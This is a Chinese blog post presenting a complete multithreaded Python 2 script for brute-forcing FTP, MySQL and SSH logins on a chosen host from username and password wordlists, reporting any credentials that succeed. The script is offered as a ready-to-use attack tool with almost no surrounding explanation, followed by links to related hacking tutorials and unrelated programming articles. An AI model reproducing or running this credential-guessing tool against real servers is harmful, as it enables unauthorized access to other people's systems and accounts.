python黑客编程之端口爆破
#coding:utf-8 from optparse import OptionParser import time,re,sys,threading,Queue import ftplib,socket,MySQLdb,paramiko global host queue = Queue.Queue() #******************************************** #color #******************************************** class bcolors: OKBLUE = '\033[94m' FAIL = '\033[91m' ENDC = '\033[0m' #******************************************** #FTP爆破模块 #******************************************** class FtpBurp(threading.Thread): """docstring for ftp""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: user,pwd = self.queue.get() try: ftp = ftplib.FTP() ftp.connect(host,21,timeout=10) ftp.login(user,pwd) print bcolors.OKBLUE+'[!]\nsuccessful---username:%s --password:%s\n' % (user,pwd) ftp.quit() except ftplib.all_errors: print bcolors.FAIL+'[*]'+user+'----'+pwd self.queue.task_done() #******************************************** #MySql爆破模块 #******************************************** class MySql(threading.Thread): def __init__(self,queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: user,pwd = self.queue.get() try: conn = MySQLdb.connect(host=host, user=user,passwd=pwd,db='mysql',port=3306) print bcolors.OKBLUE+'[!]\nsuccessful---username:%s --password:%s\n' % (user,pwd) if conn: conn.close() except MySQLdb.Error, msg: print bcolors.FAIL+'[*]'+user+'----'+pwd self.queue.task_done() #******************************************** #SSH爆破模块 #******************************************** class SSH(threading.Thread): """docstring for SSH""" def __init__(self,queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: user,pwd = self.queue.get() try: ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(host,22,user,pwd,timeout=5) print bcolors.OKBLUE+'[!]\nsuccessful---username:%s --password:%s\n' % (user,pwd) ssh.close() exit() except Exception,e: print bcolors.FAIL+'[*]'+user+'----'+pwd self.queue.task_done() #******************************************** #可添加web后台爆破 #******************************************** usage = 'Usage: %prog [-t target] [-m method]' parser = OptionParser(usage) parser.add_option('-t', dest='target', help='host') parser.add_option('-m', dest='method', help='ways') parser.add_option('-u', dest='username', help='username') parser.add_option('-U', dest='usernamedic', help='username') parser.add_option('-P', dest='passworddic', help='password') parser.add_option('-n', dest='threading', help='Thread') (options, args) = parser.parse_args() if options.target == None: parser.print_help() sys.exit(0) if options.threading: n = int(options.threading) else: n = 5 if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', options.target): host = options.target else : host = socket.gethostbyname(options.target) print 'target: %s \n' % host if options.username : userlist[0] = options.username print 'username: %s' % options.username elif options.usernamedic: userlist = [j.strip() for j in open(options.usernamedic)] print 'username_number: %d $\n' % len(userlist) passlist = [j.strip() for j in open(options.passworddic)] print 'password_number: %d $\n' % len(passlist) if options.method == 'ftp': for i in range(n): m_ftp = FtpBurp(queue) m_ftp.setDaemon(True) m_ftp.start() for user in userlist: for pwd in passlist: queue.put((user,pwd)) if options.method == 'mysql': for i in range(n): m_sql = MySql(queue) m_sql.setDaemon(True) m_sql.start() for user in userlist: for pwd in passlist: queue.put((user,pwd)) if options.method == 'ssh': for i in range(n): m_ssh = SSH(queue) m_ssh.setDaemon(True) m_ssh.start() for user in userlist: for pwd in passlist: queue.put((user,pwd)) queue.join()
python黑客编程之端口爆破的更多相关文章
- Python黑客编程2 入门demo--zip暴力破解
Python黑客编程2 入门demo--zip暴力破解 上一篇文章,我们在Kali Linux中搭建了基本的Python开发环境,本篇文章为了拉近Python和大家的距离,我们写一个暴力破解zip包密 ...
- 《Python黑客编程之极速入门》正式开课
玄魂 玄魂工作室 今天 之前开启了一个<Python黑客编程>的系列,后来中断了,内容当时设置的比较宽,不太适合入门.现在将其拆分成两个系列<Python黑客编程之极速入门>和 ...
- Python黑客编程基础3网络数据监听和过滤
网络数据监听和过滤 课程的实验环境如下: • 操作系统:kali Linux 2.0 • 编程工具:Wing IDE • Python版本:2.7.9 • 涉及 ...
- Python黑客编程ARP欺骗
Python灰帽编程 3.1 ARP欺骗 ARP欺骗是一种在局域网中常用的攻击手段,目的是让局域网中指定的(或全部)的目标机器的数据包都通过攻击者主机进行转发,是实现中间人攻击的常用手段,从而实现数据 ...
- 电子书推荐--《Python灰帽子》,python黑客编程
点此在线阅读 <Python灰帽子>是由知名安全机构Immunity Inc的资深黑帽Justin Seitz主笔撰写的一本关于编程语言Python如何被广泛应用于黑客与逆向工程领域的书籍 ...
- Python黑客编程知识点整理
Python转义字符 转义字符 意义 ASCII码值(十进制) \a 响铃(BEL) 007 \b 退格(BS) ,将当前位置移到前一列 008 \f 换页(FF),将当前位置移到下页开头 012 \ ...
- Python 黑客相关电子资源和书籍推荐
原创 2017-06-03 玄魂工作室 玄魂工作室 继续上一次的Python编程入门的资源推荐,本次为大家推荐的是Python网络安全相关的资源和书籍. 在去年的双11送书的时候,其实送过几本Pyth ...
- python网络编程01 /C/S架构|B/S架构、网络通信原理、五层协议、七层协议简述、端口映射技术
python网络编程01 /C/S架构|B/S架构.网络通信原理.五层协议.七层协议简述.端口映射技术 目录 python网络编程01 /C/S架构|B/S架构.网络通信原理.五层协议.七层协议简述. ...
- Python 网络编程(一)
Python 网络编程 socket通常也称作"套接字",用于描述IP地址和端口,是一个通信链的句柄,应用程序通常通过"套接字"向网络发出请求或者应答网络请求. ...
随机推荐
- Kotlin语法(其他)
三.其他 [TOC] 1. 多重声明 有时候可以通过给对象插入多个成员函数做区别是很方便的: val (name, age) = person 多重声明一次创建了多个变量.我们声明了俩个新变量:nam ...
- XMPP学习——3、XMPP协议学习补充
流基础 两个基本概念,使得XMPP实体之间的小的结构化信息有效载荷能快速地进行异步交换:XML流和XML节.这些术语的定义如下. XML流的定义: XML流是一个容器,用于任何两个实体通过网络进行XM ...
- c++引用总结
一.变量的引用: 引用:就是某一变量(目标)的一个别名,对引用的操作与对变量直接操作完全一样. 引用的声明方法:类型标识符 &引用名=目标变量名: 例:char ch; cha ...
- setRequestedOrientation设置屏幕方向
void android.app.Activity.setRequestedOrientation(int requestedOrientation) 官方API解释: Change th ...
- Gradle常用命令
使用cmd进入Android studio项目的根目录就可以执行一些gradle相关命令 gradle -v 查看版本 (如果你是第一次执行会去下载Gradle,这个过程如果不FQ非常慢) gradl ...
- block 页面传值小结
我以自己项目中的一个模块为例,首先有两个页面,第一个页面为显示城市页面,第二个页面为选择要使用block传的值(城市名). 第一个页面中的显示控件: //自定义左部定位视图 self.locView ...
- AFNetworking简单用法
GET请求 AFHTTPSessionManager *manager = [AFHTTPSessionManager manager]; [manager GET:URL parameters:ni ...
- http - referer
以前对Http中Referer的认识不够透彻.最近理了理,记录一下. 1 Referer可以记录访问的来源,统计访问量,可以用来防盗链. 2 客户端用js不能篡改Referer,用一些插件什么的可以达 ...
- zend studio 9.0.4 破解、汉化和字体颜色及快捷键相关设置
转载:http://www.penglig.com/post-45.html 下载:http://www.geekso.com/component/zendstudio-downloads/ 破解:h ...
- 网络编程2--毕向东java基础教程视频学习笔记
Day 23 08 Udp接收端09 Udp键盘录入数据方式10 Udp聊天11 TCP传输12 TCP传输213 TCP练习14 TCP复制文件 08 Udp接收端 需求:定义一个应用程序,用于接收 ...